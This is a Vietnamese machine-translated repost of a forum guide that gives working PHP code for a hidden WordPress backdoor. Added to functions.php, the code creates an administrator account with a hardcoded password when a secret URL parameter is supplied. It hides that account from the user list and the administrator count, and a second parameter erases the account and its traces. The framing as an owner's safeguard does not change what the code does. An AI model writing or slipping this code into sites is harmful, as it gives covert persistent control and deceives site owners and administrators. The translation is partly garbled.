HomeLập trìnhPhpHướng dẫn đầy...

Hướng dẫn đầy đủ về cửa hậu PHP cho WP_ (có thể gửi cho ai …)


Đó là phần tổng hợp những gì tôi tìm thấy trên Web liên quan đến chủ đề được đề cập bên dưới, cùng với một vài dòng mã của riêng tôi.

Đó không phải là về Mặt tối, mà là về một trường hợp khi ai đó muốn có thêm một mức độ bảo mật khi truy cập trang WP của họ trong một ‘tình huống’. Vì vậy, nếu Bạn là chủ sở hữu của dự án – đây là cách bạn có thể muốn được bảo vệ:

  • afrer bảo mật mã để hàm.php bạn nhập: /yoursite/?backdoor=go

  • nó sẽ tạo một người dùng quản trị mới trong DB của bạn;

  • bạn đăng nhập tài khoản mới tạo bằng ‘mr_admin’, ‘pa55w0rd! chứng chỉ. Bạn có nó.

!Với đoạn mã được cung cấp, bạn sẽ không được hiển thị trong bảng điều khiển WP, ngay cả khi là số lượng người dùng.

  • Sau khi thực hiện tác vụ bạn gõ /yoursite/?backdoor=leave

  • nó xóa tất cả dấu vết về sự hiện diện của bạn khỏi DB, bao gồm cả Meta của bạn.

  • nếu có bất kỳ Q nào, vui lòng liên hệ.

// Alt entr
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

//* Show number of admins minus 1
if ( username_exists( 'mr_admin' ) ) {
add_filter("views_users", "site_list_table_views");
function site_list_table_views($views){
   $users = count_users();
   $admins_num = $users['avail_roles']['administrator'] - 1;
   $all_num = $users['total_users'] - 1;
   $class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
   $class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
   $views['administrator'] = '<a href="https://forum.freecodecamp.org/t/php-backdoor-to-wp-complete-guide-to-whom-it-may/users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
   $views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
   return $views;
}
  }


//hide alt entr
function w45345p_hide_specific_user($user_search) {
global $wpdb;
$user_search->query_where =
str_replace('WHERE 1=1',
"WHERE 1=1 AND {$wpdb->users}.user_login != 'mr_admin'",
$user_search->query_where
);
}
add_action('pre_user_query','w45345p_hide_specific_user');

//remove user
add_action( 'init', 'backdoor_delete_user');
function backdoor_delete_user() {
	if ( md5( $_GET['backdoor'] ) == '6c374e70334072aeeb62ed46ea987838' ) {
		require_once( ABSPATH . 'wp-admin/includes/user.php' );
		$user = get_user_by( 'login', 'mr_admin' );
if ( $user ) { 
    wp_delete_user( $user->ID, 1);
	delete_user_meta( $user->ID, $key = '');
}
	}
}
	




Zik.vn – Biên dịch & Biên soạn Lại

Đọc thêm  Lỗi nghiêm trọng: Lỗi chưa xử lý: Gọi hàm thành viên bind_param() trên bool trong C:\xampp\htdocs\search\action.php:7 Dấu vết ngăn xếp: #0 {main} được ném vào C:\xampp\htdocs\search\ action.php trên dòng 7
spot_img

Create a website from scratch

Just drag and drop elements in a page to get started with Newspaper Theme.

Buy Now ⟶

Bài viết liên quang

DMCA.com Protection Status